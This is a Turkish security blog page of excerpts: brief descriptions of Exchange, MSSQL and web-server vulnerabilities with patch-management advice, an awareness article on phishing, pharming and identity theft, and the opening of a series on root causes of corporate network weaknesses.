Exchange sunucusu özel olarak hazırlanmış bir TNEF mesajını işlerken, sonucu uzaktan kod çalıştırma olacak bir hafıza bozulması açığından etkilenmektedir. Bununla beraber özel hazırlanmış bir MAPI komutu, Microsoft System Attendant servisi ve EMSMDB32 sağlayıcısını kullanan diğer servisleri cevap vermez bir duruma sokabilir. Bundan istifade etmek isteyecek bir saldırgan DoS saldırıları düzenleyerek sisteme erişimi durdurabilir.

9-Microsoft SQL Sunucusu Uzaktan Kod Çalıştırma Açığı

SQL sunucusu, uzaktan kod çalıştırmanın mümkün olabileceği bir açıktan etkilenmektedir. MSSQL 'sp_replwritetovarbin' prosedüründeki yanlış parametre kontrolünden kaynaklanan açığı kullanacak bir saldırgan, sistemin tüm kontrolünü ele geçirebilir.

10-Web Sunucusu "Expect" Üstbilgisinde XSS Açığı

Web sunucusu, "Header" bilgileri içinde yollanan “Expect” parametresinin içeriğini filtrelememektedir. Bu durumda XSS için kod çalıştırmak mümkün olabilmektedir. Bu açıktan yararlanacak bir saldırgan, sayfayı görüntüleyecek birinin kimlik bilgilerini çalabilir veya başka sayfalara kullanıcıyı yönlendirerek oltalama (Phishing) saldırıları düzenleyebilir.

Yukarıdaki açıklarla ortaya konmuş tabloya göz atıldığında kurum için birçok kritik açığın kaynağının "Güncelleştirme Eksiklikleri" kök nedeninden türediğini görmek mümkündür. Bu kritik açıkların var olmalarına rağmen bulunmamış olmaları, sahte güven duygusunun temellerini oluşturacaktır. Güncelleştirme politikası zayıf bir kurum bu açıklardan etkilenebilecektir.

Saldırı ihtimaline karşı hesap yapılırken çok yaygın yapılan yanlışlardan biri saldırıları yapacak olan saldırganın bir insan olmasını varsaymaktır. Hâlbuki saldırgan, açığı sömürmek için yazılmış bir kötü amaçlı yazılım, worm, virus veya trojan olabilir. Bu durumda gelebilecek saldırılara karşı ihtimal hesabı yaparken, sosyal ilişkilerin sistemdeki yerini doğru belirlemek yerinde bir tercih olacaktır.

Güncelleştirme politikası hazırlanırken, merkezi olarak çalışan bir otomatik güncelleştirme sistemi mi yoksa her ağ öğesi için elle yapılan bir sistem mi tasarlanacağı konusu kurumun kendi insiyatifinde olan bir konudur. Merkezi bir güncelleştirme sisteminin, test ortamına uygulanarak hayata geçirilmesi, yaygın olarak sağlıklı kabul edilmiş bir yapıdır. Ancak kurum, kendi ihtiyaçlarına göre bir sistem tasarlamayı seçmelidir. Bununla beraber, bazen kurumun risk yönetimi yaparak güncelleştirme yapılmaması kararına vardığı öğeler de olabilir. Bunların hepsi güvenlik hakkındaki bilinçli bir yönetimin, kuruma özel bir politika uygulamasıyla gerçekleştirilmelidir.

Gökhan MUHARREMOĞLU Devamı için tıklayın...

İnternette Bireysel Güvenliği Nasıl Sağlarız?

Günümüzde kişilerin internette bilgilerinin korunması ve bu bilgilere herhangi bir zarar gelmesinin önlenmesi ilk bakışta kolay gibi gözükse de esasında oldukça zor bir durumdur. Bilgileri korumak, kredi kartı bilgilerini kimseye vermemek veya şifreni kimseyle paylaşmamaktan ibaret değildir. Bilgileri korumak için doğru yazılımların kullanılması, internet üzerinden yapılacak alışverişlerin güvenilir siteler üzerinden yapılması, kişinin güvenli bir şekilde bilgilerini koruması sayesinde kendisine ve kişisel bilgilerine zarar gelmesini önleyebilir.

Saldırganların kullandığı bir diğer yöntem de internet üzerinden kredi kartı hırsızlığıdır. Saldırganlar, şahısların kredi kartı bilgilerini ele geçirmek için Phishing (oltalama) ve Pharming (yemleme) yöntemlerini kullanmaktadır. Phishing yönteminde saldırgan, kişinin kullandığı bankanın, e-posta hesabının ve bunun gibi özel bilgilerini girmesi gereken web sitelerinin kopyalarını yaparak kişiye gönderir. Kişi eğer bilgilerini girip devam ederse, bu kopya sitelerin içinde bulunan kod parçacıklarıyla girilen bilgiler saldırgana yönlendirir ve saldırganın bu bilgileri kullanarak kredi kartı numaralarını, şifrelerini, hesap numaralarını çalmasına olanak sağlar. Pharming yöntemi ise daha farklı şekilde işlemektedir. Pharming yönteminde, saldırgan DNS sunucusuna girer ve sunucu cache’nde tutulan yasal adresi sahte adrese yönlendirir veya kişinin bilgisayarına gönderdiği trojanla kişinin ruhu bile duymadan kişisel bilgilerini çalar. Pharming denetlenmesi çok daha zor olması nedeniyle daha tehlikelidir. Örneğin, 21 Ekim 2011 tarihinde yaşanan bir çete operasyonunda, çete üyelerinin internette kurdukları bazı alışveriş siteleriyle kişilerin kredi kartı bilgilerini çalarak milyonlarca lira vurgun yaptığı ortaya çıkmıştır. Bu saldırılara karşı alınacak belli başlı önlemler ise şöyledir:

İnternet üzerinde saldırganların kullandığı çeşitli yollar vardır. Bunlardan bir tanesi bilgisayara bulaştırılacak olan trojan veya bunun gibi yazılmış kötü amaçlı yazılımlardır. Bu tehlikeden korunmanın en hızlı ve verimli yolu antivirüs programları veya casus yazılımlarını önleyici (spyware) programları kullanmaktır. Eğer ortada bir zayıflık yoksa, virüs kendi kendine bulaşamaz. Zayıflığı engellemenin yollarından bir tanesi de güncellemelerin doğru şekilde yapıldığından emin olmaktır. Güvenlik, zararların bir anda engellenerek gelecekte yaşanabilecek sıkıntıları tamamen yok etmek anlamına gelmemektedir. Güvenliği sağlamanın belki de en gözden kaçan noktası, süreç aşamasında zaman zaman yapılacak güncellemelerden geçmektedir. Eğer bilgisayarınıza zararlı bir program girerse; e-posta hesaplarınız, banka şifreleriniz ve diğer kişisel bilgileriniz zarar görebileceği gibi, bilgisayarınızdaki değerli belgeleriniz de silinebilir, kopyalanabilir ve bilgisayar üzerinde yaptığınız her şeyi kaydedilebilir. Ayrıca bu zararlı program, harddiskinizin içinde bulunan tüm verileri silebilir ve diğer kötü amaçlı yazılımların yüklenmesine sebep olabilir. Bu gibi durumlardan korunmak için en azından şu tip basit önlemler alınabilir:

* Bilgisayarın güncellemeleri mutlaka yapılmalı

* Güncel bir antivirüs programı kullanılmalı

* Gelen e-postanın kimden geldiğine emin olunmayan durumda bu e-posta ‘spam’ olarak değerlendirilmeli

* Güvenli olmayan internet siteleri üzerinden alışveriş gerçekleştirilmemeli, bu tip sitelerde kişisel bilgiler kesinlikle kullanılmamalı

* Yapılacak online alışverişlerde gerçek kredi kartlarını kullanmak yerine "sanal kredi" kartlarının kullanılması zararı engellemede fayda sağlar

Online bankacılık işlemlerinde dikkat edilmesi gereken bazı noktalar

Saldırganların kullandığı yollardan biri de internet bankacılığını kullanarak yapılan dolandırıcılık yöntemleridir. İnternet bankacılığı kullanırken dolandırmalar yine phishing ve pharming üzerinden yapılmaktadır. Bu nedenle bankalar güvenlik önlemlerini son derece üst düzeyde ve güncel tutmaktadır. Ancak saldırganlar da kendilerini her konuda geliştirmektedir. Örneğin Mart 2011’de internet üzerindeki hesabından 11 bin TL çekildiğini fark eden bir çift, bankaya açtıkları davayla hesaplarından çekilen paralarını faiziyle beraber aldılar. Ancak yaşanan olay bankanın güvenlik açığından faydalanarak yapılmış olan bir dolandırıcılık olduğu için dava böyle sonuçlandı. Diğer yandan banka tüm güvenlik önlemlerini almış olsa da, kişi güvenilir olmayan ağ üzerinden internet bankacılığı kullanırsa saldırganın eline kişisel bilgilerinin geçmesine olanak sağlayabilir. Bu yüzden güvenilmeyen ağ üzerinden kesinlikle internet bankacılığı kullanılmamalı ve işlem yapılmamalıdır. Açılan oturum kesinlikle kapatılarak işlem sonlandırılmalı, böylece açık kalan bir sisteme daha sonra belirsiz kişilerin erişimine imkan verilmemelidir. Her banka için ayrı şifre belirlenmeli. Bankanızdan gelen ekstreleri tek tek kontrol edin. Ayrıca internet bankacılığı üzerinden yapılacak işlemleri sanal klavyeler kullanarak daha güvenli hale getirilebilirsiniz.

Kimlik hırsızlığı

İnternet üzerinden kullanılan kredi kartı hırsızlığında ve internet bankacılığı kullanılarak yapılan dolandırıcılıklarda benzer bir durum ise kimlik hırsızlığıdır. Kimlik hırsızlığı kredi kartlarınızın, kimlik kartlarınızın ve diğer bilgilerinizin bulunduğu çanta ve cüzdanlarınızın çalınarak veya internette paylaştığınız kişisel bilgileriniz kullanılarak gerçekleştirilebilir. Kimlik hırsızlığı maduruysanız adınıza alınacak sahte e-posta hesabı, sahte sabit ve cep telefonu numaraları, sahte hesapların açılması gibi durumlara maruz kalabilirsiniz. Açılacak sahte e-posta hesabıyla yapılabilecek en basit işlemlerden birisi, kişinin çevresindeki çalışma arkadaşlarına, müşterilerine, yöneticilerine gönderilecek kötü niyetli e-posta mesajlarla kişiyi zor durumda bırakmaktır. Saldırganlar internet üzerinden kişinin kimlik bilgileriyle dolandırıcılık yaparak, adına alışverişler düzenleyerek, kişi adına suç işleyerek yapılabilecek bütün işlemlerden kendine pay sağlayarak kişiyi suçlu durumuna düşürebilir.

Saldırgan ayrıca kimlik hırsızlığı yaparak daha özel bilgileri elde ederek kişiye şantaj yapabilir. Ticari yazışmaları takip ederek manipule sağlayabilir. Bu örneklerin sayısı bir hayli fazladır. Bu gibi durumları yaşamamak için kişinin yapması gerekenler, bilgilerini sadece çok güvenli internet sitelerine kaydetmek, özellikle banka hesabının bulunduğu sitelerde şifrelerini düzenli olarak değiştirmek, güvenilirliği az olan yerlerde bütün kişisel bilgilerini paylaşmamak, e-posta hesaplarının şifresini düzenli olarak değiştirmek ve kullandığı internet ağının güvenilirliğine emin olarak hareket etmektir.

Ancak bu tip durumlarda kalmamak için kişilerin yanısıra kurumlara da büyük görevler düşmektedir. Örneğin, Nisan 2011’de gerçekleşen bir olayda saldırganlar Sony PSN üzerinden gerçekleştirdiği saldırıyla kullanıcıların tamamının hesap numaraları dahil her tip bilgisiniz ele geçirdi. Kişilerin bu hırsızlıktan gördüğü zarar kadar, Sony firması da bu olayda yara aldı. Firma güvenlikle ilgili bir açık nedeniyle bu olayın yaşandığını ve hemen açığın giderildiğini duyursa da büyük ölçüde şirketin güvenilirliği sarsılmış oldu.

İnternet son 10 yılda bütün dünyayı ufaltarak, insanları birbirine bağlayarak, bireylerin internet üzerinden para kazanmalarını, kişilerin emeklerini sergileyebilmelerini sağlayan bir platform haline gelmiştir ve teknoloji devrinde bundan sonra daha da yaygın bir şekilde kullanılacağı bir gerçektir. Ancak şöyle de bir gerçek var ki; dolandırıcıları, hırsızları, saldırganları da son derece cezbetmekte ve bu kötü amaçlı insanlara para kazanmanın yollarını da açmaktadır. Bu gibi kötü amaçlar karşısında mağdur olmamak, zarar görmemek, sıkıntı yaşamamak için yapılması gerekenler bu yazıda belirtilmiştir. Bireyler, bu yolları kullanarak kendini güvenli hale getirebileceği gibi çevresini de bilinçlendirmelidir.

Rauf DİLSİZ

Not: Bu yazı Ege Üniversitesi'nde düzenlenen XVI. Türkiye'de İnternet Konferansı'nda tarafımca yapılan sunum temel alınarak yazılmıştır.

Referanslar:

http://www.mastercard.com/tr/personal/tr/education/kimlik-hirsizligi-nasil-olusuyor.html

http://www.microsoft.com/tr-tr/security/resources/phishing-whatis.aspx

http://www.cpp.com.tr/identity_protection_types_of_identity_theft.html

http://www.sayisaldelil.net/files/IdentityTheft.pdf

http://blog.lostar.com/2011/10/kimlik-hirsizligi.html

http://blog.csirt.ulakbim.gov.tr/?p=45

http://blogs.voanews.com/turkish/bizbize/2011/07/14/amerikada-kimlik-hirsizligi/

Devamı için tıklayın...

Kurumsal Ağlarda En Çok Karşılaşılan Açıklar ve 10 Kök Neden - II (1/2)

1- Güncelleştirme Eksiklikleri
Güncelleştirme politikalarının yeterli seviyede oluşturulup uygulanmaması kurumsal ağları tehdit eden kök nedenlerin başında gelmektedir. Bu kök neden, aynı zamanda sahte güven duygusu ile beslenmesi ile meşhur olup, zaman boyutunda yönetilmesi gereken riskleri de içinde barındırmaktadır.

Üçüncü parti yazılım, işletim sistemi veya donanım gibi ağ öğeleri kullanan her kurum, bu öğelerin “ürün” niteliğindeki güvenliğini yayımcı firmalarına teslim etmiş durumdadırlar. Dolayısı ile kurumlar kendi ağlarına ait güvenliğin bazı halkalarını da bu yayımcı firmalara teslim etmiş sayılabilirler. Bir yayımcının ürününe ait açığı; bulması, kapatması ile ilgili güncelleştirmeyi yayınladıktan sonra müşteri konumundaki kurumun ürünü kendi altyapısındaki sürümüyle kıyaslamasına kadar geçen süre, bu ürünü kullanan kurum için “sahte güven” duygusunun hâkim olduğu evreyi oluşturmaktadır.

Bu süre zarfında, güvenlikle ilgili mimari çözümler ve stratejiler hayata geçirilirken, güncellemelerden doğabilecek açıkların minimum risk alınarak hazırlanmış stratejilerden seçilmiş olması hayati önem taşımaktadır. Buna basit ve temel bir örnek olarak İnternet’te yayın yapan bir sunucunun gereksiz olan Portlarının bir Firewall ile çift yönlü olarak kapatılması verilebilir. Bu örneği bir senaryo ile daha da detaylandırmak mümkündür. Örnek için ele alacağımız sunucu bir Windows Web sunucusu olsun. Eğer sunucu önünde bir Firewall bulunmaz ise, bu sunucunun SMB Protokolü için gerekli olan 445 Port’unda çıkacak bir açık sistemi doğrudan İnternet’ten gelecek saldırılara karşı savunmasız bırakacaktır.

Sahte güven duygusunun hâkim olduğu evreyi kısa tutmanın veya kaldırmanın tek yolu, düzenli denetim yapmak ve iyi bir güncelleştirme politikasını hayata geçirmektir. Bir sistem, güvenlik felsefesi gereğince %100 güvenli olamayacaksa ortaya çıkacak güven duygusunun da felsefi olarak sahte olması kaçınılmazdır. Ancak zaman boyutunda tehlikeyi araştırıp riski en aza indirmiş olmak, şartlara göre oluşturulmuş bir güven duygusunun kaynağıdır. Bu durumda, sistemin zaman boyutundaki en yakın an ve şartlara göre güvenli olduğunun düşünüldüğü evre, güven duygusunun hâkim olduğu evre; sistemin zaman boyutundaki en yakın andan uzaklaştığı her ana ve şartlara göre güvenli olduğunun düşünüldüğü evre ise, sahte güven duygusunun hâkim olduğu evre olacaktır.

Gökhan MUHARREMOĞLU Devamı için tıklayın...